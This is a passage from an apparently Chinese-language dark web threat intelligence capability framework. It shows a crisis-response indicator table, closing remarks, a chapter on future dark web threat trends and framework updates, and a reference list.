none;font-family:宋体;"><span leaf="">暗网相关事件爆发后，往往将面临</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据泄露扩散、品牌声誉受损、合规追责承压</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等多重风险。若无系统化、可落地的危机应对支撑，难以规范完成事件研判报告编制、涉案证据归集提交、监管与公安单位协同配合等关键动作，易长期处于被动处置状态，进而加剧事件影响范围与损失程度。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考核</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">协助对接网络安全监管部门及公安机关</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，完成</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">分析报告编撰、证据材料规整报送、全程配合调查取证</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等全链条实操工作的能力，直接决定事件能否由被动补救转为主动处置，为最大限度压降</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">经济损失、声誉风险与合规隐患</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供关键支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.3.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据，结合暗网事件爆发后的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">合规处置要求、取证规范标准、对公对接流程</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">综合确立。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网相关泄露事件涉及监管核查与公安取证流程，相关材料撰写、证据固化、流程对接均有严格规范；若无专业支撑，极易出现材料不合规、证据链路断裂、对接流程疏漏等问题，直接影响整体处置成效。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">实战场景中，能否全程协助完成报告编撰、证据规整、取证配合等对公全流程工作，是实现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">主动控险、压降影响</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的核心关键；仅能按需提供局部协助，无法实现全流程闭环支撑；仅提供口头咨询，则无法落地实际对公对接与材料报送。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">以此分级划定标准，可客观体现对应的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对公协助能力、材料支撑能力与取证配合能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，贴合实战中合规报备与风险止损的核心需求。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.3.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">参数指标</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">危机应对指导以对公协助、材料支撑与取证配合的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">全流程落地能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为核心量化标准，具体分级如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">危机应对指导</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">仅提供咨询服务</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">针对暗网事件进行响应，基于用户需求进行协助，无法进行全流程主动推进和提供危机应对指导</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">针对暗网事件，可协助用户向网络安全监管单位或公安机关撰写分析报告、提交证据材料、配合调查取证等全流程工作，化被动为主动，最大限度降低事件带来的影响和损失</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估暗网事件发生后的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对公对接、材料整编、取证协同</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">实操能力，通过量化全流程协助落地效果，客观体现危机阶段主动控险、合规报备、压降损失的实际支撑水平。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第十章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">2026版框架体系结语</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架系统梳理了暗网威胁情报从</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集、对抗、分析、存档到响应闭环的全链路技术能力维度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，配套完善量化判定标准与分级参数，旨在形成一套可落地、可对标、可复盘的统一评估依据。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">通过对Traditional Dark Web与Dark Web Lite的双生态暗网场景全面覆盖，同时针对原始情报采集、深度研判分析、历史数据归档、本土化威胁识别、溯源调查支撑、危机合规引导等关键环节完成精细化指标设计，可直观厘清能力短板、明确优化方向，为后续针对性补强提供清晰可行的落地思路。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架为指导性参考文件，无强制约束要求，不固定评分权重与执行细则。可结合实际业务场景、风险管控需求与现有资源条件，灵活调整、适配优化相关指标内容。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">当前暗网威胁情报领域技术迭代迅速、威胁形态持续演变，攻防对抗节奏不断升级。期望本框架能够为行业提供务实参考，共同推动暗网威胁情报相关能力，朝着</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">体系化、专业化、实战化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">方向稳步精进，夯实常态化风险防控与应急处置支撑能力。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第十一章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">未来展望</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报技术是我国网络安全所有细分技术领域中发展最为滞后的技术领域，与国际前沿技术存在10年以上的代差。本框架指标中已提出的技术领域和量化参数，均围绕当前国际主流和成熟的技术分类与能力要求进行设计，旨在为国内行业提供统一、可量化、可落地的能力建设标尺。而本章节则主要基于国际暗网情报领域的前沿技术和演进趋势，对未来国内暗网情报能力建设进行前瞻性预研，为行业后续的技术迭代、能力提升和战略规划提供方向指引。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">11.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">设计目的</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本章旨在对暗网情报技术能力框架进行前瞻性展望，系统分析暗网威胁生态的未来演变趋势、情报技术能力的演进方向，以及本框架的迭代优化建议。随着人工智能、量子计算、Web3.0、自动化攻击链等新兴技术的深度融合，以及Traditional Dark Web与Dark Web Lite双生态的进一步交织融合，暗网威胁呈现出更强的组织化、智能化、跨域化特征。传统被动采集与分析模式将难以满足实战需求，本框架需主动适应这一趋势，为行业提供可落地、可迭代、可扩展的战略指引，推动国内暗网情报能力向预测性、自动化、全域闭环方向高质量发展，助力关键信息基础设施、企业数据安全与社会公共利益的长期韧性建设。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">11.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">暗网威胁生态未来演变趋势</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">未来3—5年内，暗网威胁生态将呈现以下核心演进特征：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">双生态深度融合与边界模糊化：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web的核心攻击组织与数据策源功能将更多通过Dark Web Lite实现实时分发与协同，Telegram等加密社群将成为IAB交易、勒索通告、窃密日志的主要流通渠道，威胁源迁移速度进一步加快，采集与反爬对抗难度指数级上升。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">侵公类威胁向多元化和国际化发展：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">犯罪分子通过更广泛的地下招募渠道，实现更深层次的内外勾结，能够提供和出售类型更加丰富多样的公民隐私数据；同时，其业务范围已不再局限于境内市场，正逐步向新加坡、香港、澳门、台湾、马来西亚、印度尼西亚等海外地区扩张，侵公类交易呈现明显的国际化趋势。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁智能化与自动化升级：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">RaaS服务将深度集成AI辅助攻击工具，infostealer日志与浏览器指纹数据将实现自动化清洗与交易；数据泄露与IAB交易将更多呈现“低噪声、高频次、小批量”的流通特征。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">跨域与cyber-kinetic风险凸显：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报不再局限于数据泄露，而是与物理世界基础设施（如能源、金融、交通）形成联动，勒索软件攻击将更多指向供应链与关键信息基础设施，数据泄露事件的影响面从“信息资产”扩展至“物理-网络融合”风险。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">监管与执法反制下的高动态波动：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">国际合作执法行动、平台封禁、加密协议升级将持续推动威胁源地址轮换与加密层级提升，Dark Web Lite的邀请制、临时群组特征将更加突出，传统采集手段的时效性窗口进一步压缩。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">11.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">暗网情报技术能力未来发展方向</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为应对上述趋势，暗网情报技术能力需在现有七大核心能力域基础上实现以下突破：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集能力向全域自动化与自适应演进：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web的反爬对抗将引入AI驱动的动态指纹伪装与自适应爬虫；Dark Web Lite采集将实现多模态（消息、图片、附件、视频）全自动解析与向量嵌入，支持TB级超大附件智能定位与风险预判。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">智能分析能力向预测性与因果推理升级：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基于大模型与知识图谱的因果推理引擎将成为标配，实现“威胁者TTP预测”“潜在泄露风险链路推演”“攻击路径自动化模拟”；同时需强化对多元化公民隐私数据及跨区域国际化交易模式的语义理解与实体关联能力，支持多语言、跨司法管辖区的精准研判。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高保真存档与知识库能力向量子安全与分布式演进：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">采用后量子加密算法实现高保真情报的长期存档；海量泄露数据知识库将构建联邦学习机制，支持跨机构隐私保护下的联合建模，提升事件处置与响应闭环的协同效率。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">事件处置与响应闭环向自动化编排与闭环反馈演进：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">实现“采集—分析—研判—溯源—阻断—反馈”的全流程自动化编排，结合SOAR平台形成秒级响应能力；中文暗网生态环境威胁识别将融入实时行为画像与风险评分模型，支持侵公威胁的自动化等级研判与应急指导。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">能力评估体系向动态量化与AI辅助评估演进：</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架的量化指标将引入实时自适应阈值，支持AI驱动的能力成熟度自动评估；新增“预测性情报输出准确率”“自动化响应覆盖率”等新兴指标，实现框架与实战的动态对齐。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">11.4.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">本框架未来迭代方向</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架作为指导性技术文件，将保持开放迭代属性，构建暗网情报技术共享，预期每12—18个月进行一次版本更新，重点纳入以下内容：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">新增能力域或指标项（如量子安全采集对抗、多模态AI分析、联邦学习知识库等）。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">动态调整量化阈值，参考全球最新报告（Javelin、Gartner、Forrester等）与国内实战数据进行校准。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">强化与国家网络安全监管政策、数据安全法、个人信息保护法的深度适配，增加合规性边界指标。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">构建配套评估工具与参考实现指南，支持政企机构开展能力自评与供应商选型。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">通过持续迭代，本框架将始终保持科学性、实战性与前瞻性，成为国内暗网情报领域标准化、专业化、实战化的参考标尺。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">11.5.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">结语</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报能力建设是一场没有终点的持久战。未来，唯有坚持技术创新与生态协作并重，构建“采集—分析—存档—响应—反馈”的智能化闭环，才能在复杂对抗环境中始终占据主动。本框架的发布与迭代，目的正是为行业提供统一、科学、可落地的能力标尺，助力国内网络安全产业向高质量发展迈进，共同守护数字中国的网络空间安全与数据主权。</span></span></p><h1 style="font-size:17px;"><p style="margin-bottom: 16px;"><span data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 16px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong><span leaf=""><span textstyle="" style="font-size: 15px;color: rgb(255, 41, 65);">点击左下角原文链接下载pdf报告。</span></span></strong></span></p></h1><h1 style="margin-bottom: 16px;font-size:17px;"><span style=""><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">参考文献</span></span></span></h1><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">1.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Javelin Strategy &amp; Research, Dark Web Threat Intelligence Vendor Scorecard, 2025</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">2.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Gartner, Market Guide for Security Threat Intelligence Products and Services, 2024</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">3.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Forrester, The State of Threat Intelligence, 2025</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">4.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Forrester, External Threat Intelligence Service Providers Landscape, 2025</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">5.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Flashpoint, Technical Analysis of High-Wall Underground Forums: XSS and Exploit, 2025</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">6.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Recorded Future, Defense Mechanisms in Russian Cybercrime Forums: XSS.is and Exploit.in Case Study, 2025</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">7.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Flare Systems, Telegram Cybercrime Ecosystem Report, 2025</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 21.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">8.</span></span><span style="font-variant: normal;text-transform: none;font-style: italic;font-family:Calibri;"><span leaf="">Chainalysis, Crypto Crime Report 2025</span></span></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://www.dwcon.cn/uploads/file/2026/0409%E3%80%90%E6%95%B0%E4%B8%96%E5%92%A8%E8%AF%A2%E3%80%91%E6%9A%97%E7%BD%91%E6%83%85%E6%8A%A5%E6%8A%80%E6%9C%AF%E8%83%BD%E5%8A%9B%E6%A1%86%E6%9E%B6%E5%8F%8A%E5%8F%82%E8%80%83%E6%8C%87%E6%A0%87%E4%BD%93%E7%B3%BB.pdf">阅读原文</a></p>
